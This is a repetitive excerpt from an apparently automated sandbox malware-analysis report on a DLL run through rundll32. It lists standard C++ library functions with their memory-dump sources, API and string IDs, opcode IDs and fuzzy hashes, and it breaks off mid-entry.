                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 6dc5dc1771d10e344de0ccb396d5e2778d4d018ff2c769379d7feb57f0715546
                                                                                                                                  • Instruction ID: d7988e17b3725b2409f932854fd4a3b422a4396c3d031bda681015576420d7f9
                                                                                                                                  • Opcode Fuzzy Hash: 6dc5dc1771d10e344de0ccb396d5e2778d4d018ff2c769379d7feb57f0715546
                                                                                                                                  • Instruction Fuzzy Hash: DE314F32604A8881FAD6DB15E4403D97761F79DBE0F548222F65D636E5DE38C78DC700
                                                                                                                                  Function 000000018000F178 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  • Opcode ID: c1ad271fe33d91cd47d2852839b2ce4b5c05dbc669564f68ca22ba5cf5126d8f
                                                                                                                                  • Instruction ID: 05c0de9255826c6bef9e5404167eb3cddf1f87d963d99c9ec1c58014a44890e4
                                                                                                                                  • Opcode Fuzzy Hash: c1ad271fe33d91cd47d2852839b2ce4b5c05dbc669564f68ca22ba5cf5126d8f
                                                                                                                                  • Instruction Fuzzy Hash: 44314176604A4881EAA6DB15E4503E97760F79C7E0F548322FA6D03BE9DE38C78EC700
                                                                                                                                  Function 000000018000F9C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  • Opcode ID: 03e76c395403f9925dd663e28b75ce9b1ad016ac71419344fc38d9e9773d2bc8
                                                                                                                                  • Instruction ID: ece7884c02b4ebca02d2dba318e864f23f9d4b6102c45f6ad76164ea4142065f
                                                                                                                                  • Opcode Fuzzy Hash: 03e76c395403f9925dd663e28b75ce9b1ad016ac71419344fc38d9e9773d2bc8
                                                                                                                                  • Instruction Fuzzy Hash: 1B315272704B4881EAA3DB15E4403E97760E79DBE4F548221FA5D17BE9DE38C68AC700
                                                                                                                                  Function 0000000180008200 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: d2e83e9231d16ea01c07958aeaaaa4caef9aee7f5abb66e199b44a73ff621b09
                                                                                                                                  • Instruction ID: fc80639a25eda0d0840aad3c647064db7dd1c62e6b2bd08ed960b1421dfd7e0d
                                                                                                                                  • Opcode Fuzzy Hash: d2e83e9231d16ea01c07958aeaaaa4caef9aee7f5abb66e199b44a73ff621b09
                                                                                                                                  • Instruction Fuzzy Hash: 81313D31605B4881EA92DB15E4443D977A1FB98BE0F548221FA9D176E9DF38C68E9700
                                                                                                                                  Function 0000000180023A54 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 64fc0b7241fd2fa6ecba5e4239454da0e7d9bf1393a0a330c2f65e3e5c872203
                                                                                                                                  • Instruction ID: 24dc92240a733358afca9a5473095d117544f2bced7408c023fd1db7623d7554
                                                                                                                                  • Opcode Fuzzy Hash: 64fc0b7241fd2fa6ecba5e4239454da0e7d9bf1393a0a330c2f65e3e5c872203
                                                                                                                                  • Instruction Fuzzy Hash: 6D316F71604A4881EA97DB15E8513DA6760F79CBE0F548322FB9D136E6DF38CA8DC700
                                                                                                                                  Function 000000018000EA58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: fa39000a9970348669bddc9ddd868ce9499a2a0f09ae09316945077eb49df745
                                                                                                                                  • Instruction ID: 256997454fb0768d937e5236695cd4a42c3911470dfc27f4f3246bfe781b264e
                                                                                                                                  • Opcode Fuzzy Hash: fa39000a9970348669bddc9ddd868ce9499a2a0f09ae09316945077eb49df745
                                                                                                                                  • Instruction Fuzzy Hash: 52315E72704B8881FA96DB15E8403DA7361F79DBE0F588222BA5E176E5DF38D68DC700
                                                                                                                                  Function 000000018000F2A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  • Opcode ID: 0e73463bbbdd58031d34cd0dacd00404d5dd0a9fded515b625f2b8c72c3f4f6e
                                                                                                                                  • Instruction ID: 109307e02aa07442a5533241676dd05e444ebde23d5f59b864ab3c21283e98e5
                                                                                                                                  • Opcode Fuzzy Hash: 0e73463bbbdd58031d34cd0dacd00404d5dd0a9fded515b625f2b8c72c3f4f6e
                                                                                                                                  • Instruction Fuzzy Hash: 9E313072604A4882EAA6DB15E4503E97361E798BE0F588221FA6D437E5DF78C78E9700
                                                                                                                                  Function 000000018000FAF8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  • Opcode ID: f1f315d357278705815692d30c91284999734579805cd6aac418ab0c5791075c
                                                                                                                                  • Instruction ID: a5587e62e306e01d309a23b52e80ead7e7268470319b1834d7f7869813062665
                                                                                                                                  • Opcode Fuzzy Hash: f1f315d357278705815692d30c91284999734579805cd6aac418ab0c5791075c
                                                                                                                                  • Instruction Fuzzy Hash: 54313D71604A4881EAA7DB15E4507E97361E79CBE0F548222FA5E13BE9DF38C68ED700
                                                                                                                                  Function 0000000180008330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 4068408745-3145022300
                                                                                                                                  • Opcode ID: b99809600cb807d6792835c2380899c2947ebd0d65ddbedb7e4521f86c2dc54b
                                                                                                                                  • Instruction ID: 5f48a92dd4c4338798bd1fa2af2806e56aa42fdb72c7ea48e45cf4e83205126c
                                                                                                                                  • Opcode Fuzzy Hash: b99809600cb807d6792835c2380899c2947ebd0d65ddbedb7e4521f86c2dc54b
                                                                                                                                  • Instruction Fuzzy Hash: 3E314F31605A4881FA97DB15E4503DA77A1FB98BE0F548321FA9D036E5DE38C78ED700
                                                                                                                                  Function 0000000180023B84 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 2e6a52849d769a2e1413fd232250c65d1901f3564be83fb5643226a8b7ee650c
                                                                                                                                  • Instruction ID: 8ded690d922abd832e9d273035f0c347a84f20339b8b3f02e343dfb5c422cbb4
                                                                                                                                  • Opcode Fuzzy Hash: 2e6a52849d769a2e1413fd232250c65d1901f3564be83fb5643226a8b7ee650c
                                                                                                                                  • Instruction Fuzzy Hash: 84315E72604A4C81FAA7DB15E4513E96760F79CBE0F64C322BA5D176E5DE38CA8EC700
                                                                                                                                  Function 000000018000EB88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: c0a4adc6c9eb2be6ab9aca49803a2461e551489b6d1e2fac807d288f8c8a4382
                                                                                                                                  • Instruction ID: b2b594c90fe963b09e6cff62a57c5274ba6f46d917d7b3e8eb7efe257ebbc62c
                                                                                                                                  • Opcode Fuzzy Hash: c0a4adc6c9eb2be6ab9aca49803a2461e551489b6d1e2fac807d288f8c8a4382
                                                                                                                                  • Instruction Fuzzy Hash: 06316132604A8C81FA97DB15E4407D97761F799BE0F54C222FA5D236E5DE39C68EC700
                                                                                                                                  Function 000000018000F3D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  • Opcode ID: 9a263112a183061fb21462d9867a638ce62413c5ba775c98e0fc9ca059aadcfa
                                                                                                                                  • Instruction ID: 0429968c920f662819e1cb35532bae73eeb9a1535b330badf44fc322d12eeabc
                                                                                                                                  • Opcode Fuzzy Hash: 9a263112a183061fb21462d9867a638ce62413c5ba775c98e0fc9ca059aadcfa
                                                                                                                                  • Instruction Fuzzy Hash: 93316132604A4881EAA2DB15E4503EA7760F79CBE4F548322FA5D037E5DF78C68EC700
                                                                                                                                  Function 000000018000E468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 2666907392-3145022300
                                                                                                                                  • Opcode ID: 8bf4df6cf43bf922fa39b87c50c5163b31fb7ab6ed35ac58d1c89d7f1da5f821
                                                                                                                                  • Instruction ID: e17c34a64e892375947f478ee5778eb12655eca52efa774ef1c8d2b73f90135f
                                                                                                                                  • Opcode Fuzzy Hash: 8bf4df6cf43bf922fa39b87c50c5163b31fb7ab6ed35ac58d1c89d7f1da5f821
                                                                                                                                  • Instruction Fuzzy Hash: 9E316F71604E8881EA97DB15E8403D97761F79DBE4F548322FA9D136E5DE38CA8EC700
                                                                                                                                  Function 0000000180023CB4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 9610e6b592e85278086d84bd98d7bd1b9d2e3fea67ca7d993f2e511d6aafebe0
                                                                                                                                  • Instruction ID: 42da7f15c0a14e143d39768027cbac4f10d9d296bb43efe929394bade188cc91
                                                                                                                                  • Opcode Fuzzy Hash: 9610e6b592e85278086d84bd98d7bd1b9d2e3fea67ca7d993f2e511d6aafebe0
                                                                                                                                  • Instruction Fuzzy Hash: 05315071604A4881EAA3DB19F4413D96761F79CBE0F548322FA6D476E9DF38CA8EC700
                                                                                                                                  Function 000000018000ECB8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 84dfab6d8172c11f77b414dd97d6e914d8b7a96cc48963b32e03c45dc50c657e
                                                                                                                                  • Instruction ID: 2c6c7a7b1d17f320c1792f218ce074bad44cb980c5a52b758e2d6f8c93f6019b
                                                                                                                                  • Opcode Fuzzy Hash: 84dfab6d8172c11f77b414dd97d6e914d8b7a96cc48963b32e03c45dc50c657e
                                                                                                                                  • Instruction Fuzzy Hash: 7D316F72604A8881EA97DB15E8503D97761F798BE0F68C322FA5D176E5DF38C68DC700
                                                                                                                                  Function 000000018000F508 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 576065deb2ea874c3d036d3935cf1e4fa8ca15b2c119d416514965b14070bf2d
                                                                                                                                  • Instruction ID: afb1d25f7f6a659e3ccf1534ae0290ba0e63db629d8d0aed09161fb4d3141880
                                                                                                                                  • Opcode Fuzzy Hash: 576065deb2ea874c3d036d3935cf1e4fa8ca15b2c119d416514965b14070bf2d
                                                                                                                                  • Instruction Fuzzy Hash: FC315272604B4881EAA6DB15E8403E97760F75CBE0F548222FA5D037E5DF39C68DD700
                                                                                                                                  Function 0000000180006940 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast$ios_base::badbit set
                                                                                                                                  • API String ID: 1776536810-182444483
                                                                                                                                  • Opcode ID: 8350d050f5a0f01878a3f2d3d7fa6fc40c68057f815e104cabb17d988fe9a483
                                                                                                                                  • Instruction ID: 02ad155c9015395c238964cca4a8f2f47d031e4f92e59427d6e1992964da67f8
                                                                                                                                  • Opcode Fuzzy Hash: 8350d050f5a0f01878a3f2d3d7fa6fc40c68057f815e104cabb17d988fe9a483
                                                                                                                                  • Instruction Fuzzy Hash: 3D314C32600A4881EA97DB15E5403D97361E798BE0F589222FA6E577F9DE38C68AC700
                                                                                                                                  Function 00007FFD92DB6430 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 78threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
